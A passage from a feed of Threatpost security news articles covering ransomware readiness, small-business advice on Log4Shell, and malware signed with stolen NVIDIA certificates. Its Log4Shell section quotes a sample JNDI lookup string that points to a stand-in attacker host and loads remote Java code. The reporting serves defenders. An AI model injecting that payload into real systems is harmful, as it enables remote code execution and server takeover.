organizations\u2019 IT security readiness. Their confidence is disconnected from their admittance that their cybersecurity incidents are a result of their own outdated IT security plans, including widespread use of insecure and deprecated protocols, as well as growing numbers of unmanaged devices.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThe reality: 69 percent of respondents acknowledged transmitting sensitive data over unencrypted HTTP connections instead of more secure HTTPS connections. Another 68 percent are still running SMBv1, the protocol exploited in major/ancient/still-exploited attacks like [WannaCry](<https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/>) and [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), leading to more than $1 billion in damages worldwide.\n\nDenial ain\u2019t just a river in Egypt. The delusion is particularly dangerous, given the sky-high rate of ransomware attacks. In ExtraHop\u2019s Cyber Confidence Index 2022 \u2013 which surveyed 500 security and IT decision makers in the United States, United Kingdom, France and Germany \u2013 85 percent reported having suffered at least one ransomware attack, and 74 percent reported experiencing multiple incidents in the past five years.\n\n * A jarring majority have experienced a ransomware attack, with some being hit twice. What\u2019s more, the data shows that if a business is hit once, it\u2019s more likely to be hit again.\n * A number of IT decision makers haven\u2019t faced an attack \u2013 and so they \u201caren\u2019t concerned.\u201d\n * 77 percent of IT decision makers are very or extremely confident in their company\u2019s ability to prevent or mitigate cybersecurity threats. And yet \u2026\n * 64 percent admit that half or more of their cybersecurity incidents are the result of their own outdated IT security postures.\n * 85 percent reported having suffered at least one ransomware attack in the past five years, and 74 percent have experienced multiple attacks.\n * 48 percent of companies that suffered a ransomware attack said they paid the ransom demanded most or all of the time.\n\nJamie Moles, ExtraHop senior technical manager, dropped by the Threatpost podcast to talk about perceptions vs. reality.\n\nWannaCry, which hit a few years ago, is a prime example, he told us. The advice back then (and now) was that organizations should check their backups to make sure they\u2019re usable. Innumerable articles and blogs interrogated admins, asking, Have you actually restored a backup recently to make sure that your restores work? Are they up to date?\n\n\u201cA lot of people, we\u2019re finding, actually, that their backup procedures were good, but maybe the technology wasn\u2019t up to date or they were too reliant on things like [volume shadow copies](<https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service>) on workstations,\u201d Jamie told us. \u201cA restore when data was corrupted, not realizing that ransomware gangs turn off volume shadow copies on workstations.\n\n\u201cSo you can\u2019t restore from that. And a lot of organizations found that maybe their backups weren\u2019t fully up to date and they had to go too far back in time to restore, to get themselves operationally back to date. And this has an obvious impact in terms of operating. Resilience has a cost factor associated with it, and getting yourself back to where you were yesterday.\u201d\n\nSo\u2026not to imply anything, but hey, we just thought we\u2019d ask: Have you checked your backups lately to make sure they work?\n\nIf not, maybe go do that. We\u2019ll wait. This podcast doesn\u2019t have an expiration date.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030722_ExtraHop_Jamie_Moles_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:00:32", "type": "threatpost", "title": "Multi-Ransomwared Victims Have It Coming\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:00:32", "id": "THREATPOST:02A472487653A461080415A3F7BB23D2", "href": "https://threatpost.com/blaming-ransomware-victims-podcast/178799/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d \u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, __co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpo__st)._\n\n_**Questions answered (click to jump to the appropriate section):**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the log4j library to log data. Because that library is almost ubiquitous in Java applications, virtually any business that has a website is highly likely to be affected. With one line of malicious code, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. \u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne: **In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit**: The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping into every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of product management at Invicti Security: **This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cA real world-attack can be as simple as the attack sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in[ this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers: **Attackers send requests to vulnerable applications, this triggers the vulnerability. The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers: **These kinds of wide sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendor\u2019s software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to __[Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)__, the log4j 2 library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. SMBs that have built applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers: **This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven: **\u201cWhile IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is __[available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading._ _Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman: **It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers: **I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. Any business using MSP services should reach out to their provider and request a status update on the Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** \u201cCyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\n\n**Invicti\u2019s Adam Goodman: **This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident is open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven: **A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman: **SMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies, [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\u201d\n\n**ESET\u2019s L\u00e9veill\u00e9: **As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cRemediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network to attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published[ a detailed technical post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\n\n**Anchore\u2019s Bressers: **An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally more important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers: **As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9: **SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers: **SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, features security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T21:13:09", "description": "Two of NVIDIA\u2019s code-signing certificates were part of the Feb. 23 Lapsus$ Group ransomware attack the company suffered \u2013 certificates that are now being used to sign malware so malicious programs can slide past security safeguards on Windows machines.\n\nThe Feb. 23 attack saw 1TB of data bleed from the graphics processing units (GPUs) maker: a haul that included data on hardware schematics, firmware, drivers, email accounts and password hashes for more than 71,000 employees, and more.\n\nSecurity researchers [noted](<https://twitter.com/cyb3rops/status/1499514240008437762>) last week that malicious binaries were being signed with the stolen certificates to come off like legitimate NVIDIA programs, and that they had appeared in the malware sample database VirusTotal.\n\nThe signed binaries were detected as [Mimikatz](<https://threatpost.com/nefilim-ransomware-ghost-account/163341/>) \u2013 a tool for lateral movement that allows attackers to enumerate and view the credentials stored on the system \u2013 and for other malware and hacking tools, including [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) beacons, backdoors and remote access trojans (RATs) (including a [Quasar RAT](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/>) [[VirusTotal](<https://www.virustotal.com/gui/file/065077fa74c211adf9563f00e57b5daf9594e72cea15b1c470d41b756c3b87e1>)] and a Windows driver [[VirusTotal](<https://www.virustotal.com/gui/file/2f578cb0d97498b3482876c2f356035e3365e2c492e10513ff4e4159eebc44b8/detection>)]).\n\n> Gist that contains [@virustotal](<https://twitter.com/virustotal?ref_src=twsrc%5Etfw>) Enterprise search queries to find samples signed with the leaked NVIDIA certificates[#NvidiaLeaks](<https://twitter.com/hashtag/NvidiaLeaks?src=hash&ref_src=twsrc%5Etfw>) [#LAPSUS](<https://twitter.com/hashtag/LAPSUS?src=hash&ref_src=twsrc%5Etfw>)\n> \n> based on my and [@GossiTheDog](<https://twitter.com/GossiTheDog?ref_src=twsrc%5Etfw>)'s work \n<https://t.co/JxnbrLSjVz> [pic.twitter.com/KYRKdYcF8R](<https://t.co/KYRKdYcF8R>)\n> \n> \u2014 Florian Roth \u26a1\ufe0f (@cyb3rops) [March 5, 2022](<https://twitter.com/cyb3rops/status/1500091665595387909?ref_src=twsrc%5Etfw>)\n\n## Expired But Still Recognized Certs: A \u2018Significant Threat\u2019\n\nBoth of the stolen NVIDIA code-signing certificates are expired, but they\u2019re still recognized by Windows, which allow a driver signed with the certificates to be loaded in the operating system, according to [reports](<https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/>).\n\nAccording to security researchers [Kevin Beaumont](<https://twitter.com/GossiTheDog>) and [Will Dormann](<https://twitter.com/wdormann>), the stolen certificates use these serial numbers:\n\n * 43BB437D609866286DD839E1D00309F5\n * 14781bc862e8dc503a559346f5dcc518\n\nCasey Bisson, head of product and developer relations at code-security product provider BluBracket, called the certificate theft a \u201csignificant threat.\u201d\n\n\u201cSigning certificates are the keys computers use to verify trust in software,\u201d he told Threatpost via email on Monday. \u201cValidating code signatures is a critical step in securing the global code supply chain, and it protects everybody from average consumers running Windows Updates (where signatures are validated automatically) to developers using software components in larger projects (where signatures are hopefully checked as part of the CI process).\u201d\n\nMike Parkin, senior technical engineer at enterprise cyber risk remediation provider Vulcan Cyber, agreed that malware authors being able to use legitimate certificates to sign their code \u201ccan have far -reaching consequences.\n\nThe dire situation is somewhat mitigated due to the stolen certificates having expired, he said in an email on Monday, but that\u2019s not a perfect solution. \u201cThis will make it easier for anti-malware applications to identify malicious code signed with these certs, but there is still the challenge of Microsoft\u2019s operating systems accepting them as valid even past their expiration,\u201d he said.\n\n## Supply Chain\n\nBisson noted that given NVIDIA\u2019s massive install base \u2013 its technology shows up everywhere from gaming to crypto miners to industrial and scientific super-computing \u2013 a supply chain attack targeting users could have \u201cenormous implications.\u201d\n\nHe pointed to global power consumption as one yardstick of how NVIDIA\u2019s hardware is slathered across the world: \u201cSome estimates peg crypto as consuming over half a percent of the world\u2019s annual electric generation on its own,\u201d he said, \u201cmost of that related to power-hungry Nvidia processors dependent on Nvidia\u2019s software signed by these keys.\u201d\n\nNVIDIA\u2019s hardware is critical for gaming and media production, as well as cloud-based artificial intelligence (AI) and machine-learning (ML) that powers everything from voice assistants, image and video processing (including automated moderation), and manufacturing quality control systems, Bisson pointed out.\n\nHe suggested that the fix for supply-chain threats is to establish a new chain of trust in NVIDIA\u2019s software development workflow with new certificates. \u201cUpstream certificate authorities can revoke Nvidia\u2019s old certificates to block installation of any potentially compromised software with those certificates,\u201d he explained. \u201cAs always, intrusion detection and access control audits are critical to preventing new intrusion attacks, while enforcing signed commits and continuous automated code scanning for secrets, dependency vulnerabilities, along with manual testing are solid steps to ensuring the security of their software.\u201d\n\n## How to Block the Signed Malware\n\nDavid Weston, director of enterprise and OS security at Microsoft, [tweeted](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1499527802382471188%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Fmalware-now-using-nvidias-stolen-code-signing-certificates%2F>) on Thursday that admins can keep Windows from loading known, vulnerable drivers by configuring [Windows Defender Application Control policies](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/select-types-of-rules-to-create>) to control which of NVIDIA\u2019s drivers can be loaded.\n\nThat should, in fact, be admins\u2019 first choice, he wrote.\n\n> WDAC policies work on both 10-11 with no hardware requirements down to the home SKU despite some FUD misinformation i have seen so it should be your first choice. Create a policy with the Wizard and then add a deny rule or allow specific versions of Nvidia if you need\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499527802382471188?ref_src=twsrc%5Etfw>)\n\nDavid Weston, Microsoft vice president for OS Security and Enterprise, went on to [tweet](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710>) the attributes to be blocked or allowed.\n\n> These are all the attributes you can block or allow on: [pic.twitter.com/3BV3QoMuMX](<https://t.co/3BV3QoMuMX>)\n> \n> \u2014 David Weston (DWIZZZLE) (@dwizzzleMSFT) [March 3, 2022](<https://twitter.com/dwizzzleMSFT/status/1499528020410781710?ref_src=twsrc%5Etfw>)\n\nUnfortunately, Microsoft\u2019s WDAC fix isn\u2019t a practical solution for the majority of Windows users, who aren\u2019t technically literate, Vulcan Cyber\u2019s Parkin pointed out.\n\nA better approach would be for Microsoft to recognize the certificates as expired and no longer accept them as legitimate, he told Threatpost.\n\n## Doxxed Emails, Password Hashes & More\n\nOn Feb. 27, Lapsus$ claimed that it had been in NVIDIA\u2019s systems for a week, that the gang isn\u2019t state-sponsored and that it\u2019s \u201cnot into politics AT ALL\u201d \u2013 a clarification that\u2019s apparently important for cybercrooks now that the Russia/Ukraine [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) is burning at fever pitch.\n\nLast Wednesday, March 2, the compromised-email notice site Have I Been Pwned put up an [alert](<https://haveibeenpwned.com/PwnedWebsites#NVIDIA>) regarding 71,335 NVIDIA employees\u2019 emails and NTLM password hashes having been leaked on Feb. 23, \u201cmany of which were subsequently cracked and circulated within the hacking community.\u201d\n\nAs has been [noted](<https://www.theverge.com/2022/3/4/22962217/nvidia-hack-lapsus-have-i-been-pwned-email-breach-password>), at least on the face of it, that number of 71,000 compromised employee accounts \u2013 a number that the graphics processing units maker hasn\u2019t confirmed or denied \u2013 doesn\u2019t make sense. In its most recent quarterly report ([PDF](<https://s22.q4cdn.com/364334381/files/doc_downloads/2021/04/2021-Annual-Review.pdf>)), NVIDIA only listed a workforce of 18,975.\n\nBut, given that the Telegraph\u2019s initial [report](<https://www.telegraph.co.uk/business/2022/02/25/us-microchip-powerhouse-nvidia-hit-cyber-attack/>) cited an insider who said that the intrusion \u201ccompletely compromised\u201d the company\u2019s internal systems, it could be that the stolen data included former employees.\n\nLapsus$ released a portion of the highly confidential stolen data, including source codes, GPU drivers and documentation on NVIDIA\u2019s fast logic controller product, also known as Falcon and Lite Hash Rate, or LHR GPU.\n\nLapsus$ demanded $1 million and a percentage of an unspecified fee from NVIDIA for the Lite Hash Rate bypass.\n\nLapsus$ also demanded that NVIDIA open-source its drivers, lest Lapsus$ do it itself.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07123426/Lapsus-threat.jpg>)\n\n## Who Is Lapsus$ Group?\n\nLapsus$ Group emerged last year. It\u2019s probably best known 